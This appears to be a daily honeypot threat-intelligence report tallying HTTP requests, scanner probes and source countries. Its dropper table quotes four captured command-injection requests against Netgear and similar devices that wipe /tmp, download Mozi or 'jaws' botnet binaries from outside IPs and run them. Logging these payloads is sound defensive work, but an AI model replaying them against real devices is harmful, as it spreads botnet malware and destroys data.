Daily Report: 2025-04-19#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 25 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1522 requests were recorded during the day, originating from 4 different countries, with a peak of 256 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
221.15.21.58 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.15.21.58:59826/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
81.108.237.134 | GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1 |
27.37.225.204 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
5.232.197.153 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://2.181.231.51:53192/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
121 | 1 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
127 | 1 | GET /LoTM HTTP/1.1 |
134 | 1 | GET /nmaplowercheck1745061921 HTTP/1.1 |
148 | 1 | GET /NmapUpperCheck1745061921 HTTP/1.1 |
152 | 1 | GET /Nmap/folder/check1745061921 HTTP/1.1 |
163 | 1 | GET /Shq0 HTTP/1.1 |
175 | 1 | GET /api/bin/440393?time=1745038592926894374 HTTP/1.1 |
176 | 1 | GET /config/index?time=1745036279894552763 HTTP/1.1 |
177 | 1 | POST /api/user/binLookup?time=1745035243131334900 HTTP/1.1 |
178 | 1 | GET /api/bin/440393?time=1745035242484225653 HTTP/1.1 |
179 | 1 | GET /config/index?time=1745034571326795697 HTTP/1.1 |
223 | 1 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
277 | 1 | GET /BgJi HTTP/1.1 |
283 | 1 | POST /api/user/binLookup?time=1745042000504518878 HTTP/1.1 |
284 | 1 | GET /api/bin/440393?time=1745042000006159705 HTTP/1.1 |
300 | 1 | POST /api/user/binLookup?time=1745038834035574055 HTTP/1.1 |
301 | 1 | GET /api/bin/440393?time=1745038833652444934 HTTP/1.1 |
304 | 1 | GET /config/index?time=1745036375245076012 HTTP/1.1 |
307 | 1 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
322 | 1 | GET /config/index?time=1745038896988933583 HTTP/1.1 |
324 | 1 | POST /api/user/binLookup?time=1745036232541860845 HTTP/1.1 |
325 | 1 | GET /api/bin/440393?time=1745036232049909373 HTTP/1.1 |
326 | 1 | GET /config/index?time=1745035232450715863 HTTP/1.1 |
333 | 1 | GET /mtC8 HTTP/1.1 |
336 | 1 | GET /oM7i HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 256 | GB |
1 | 220 | US |
2 | 182 | SC |
3 | 153 | DE |
4 | 105 | NL |
5 | 93 | HK |
6 | 79 | SE |
7 | 75 | CN |
8 | 74 | PL |
9 | 71 | LT |
10 | 61 | CA |
11 | 27 | JP |
12 | 15 | ID |
13 | 13 | KR |
14 | 13 | SG |
15 | 12 | BG |
16 | 10 | VN |
17 | 7 | FR |
18 | 7 | UA |
19 | 6 | IT |
20 | 6 | BE |
21 | 6 | RU |
22 | 5 | IN |
23 | 4 | GE |
24 | 4 | AU |
25 | 4 | TR |
26 | 3 | AO |
27 | 2 | AR |
28 | 2 | AL |
29 | 2 | TW |
30 | 1 | MC |
31 | 1 | IR |
32 | 1 | TH |
33 | 1 | DO |
34 | 1 | PT |